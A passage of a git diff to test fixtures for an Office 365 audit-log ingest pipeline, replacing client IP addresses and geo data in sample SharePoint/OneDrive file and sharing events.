"{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -699,25 +591,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png" @@ -760,7 +634,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -772,12 +646,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703797900Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865177200Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -815,25 +689,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -877,7 +733,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -889,12 +745,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703799600Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865180800Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -932,25 +788,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -993,7 +831,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1005,12 +843,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703801300Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865185100Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -1048,25 +886,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -1109,7 +929,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1121,12 +941,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703803Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865190700Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", @@ -1164,25 +984,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "url": { "original": "https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png" @@ -1225,7 +1027,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { @@ -1237,12 +1039,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:54.703804700Z", - "original": "{\"ClientIP\":\"213.97.47.133\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", + "ingested": "2021-12-09T13:42:46.865195600Z", + "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", "kind": "event", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json index d65020171e7..a5d38df6ca0 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json @@ -147,10 +147,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003ccopyRoleAssignments\u003eFalse\u003c/copyRoleAssignments\u003e\u003cclearSubScopes\u003eFalse\u003c/clearSubScopes\u003e", @@ -176,10 +176,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" + "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}" }, "o365audit": { - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CorrelationId": "fe71359f-005f-9000-7cb1-ccf5124703db", "CreationTime": "2020-02-14T18:25:45", "EventData": "\u003cType\u003eEdit\u003c/Type\u003e", @@ -209,10 +209,10 @@ }, { "event": { - "original": "{\"ClientIP\":\"79.159.10.151\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a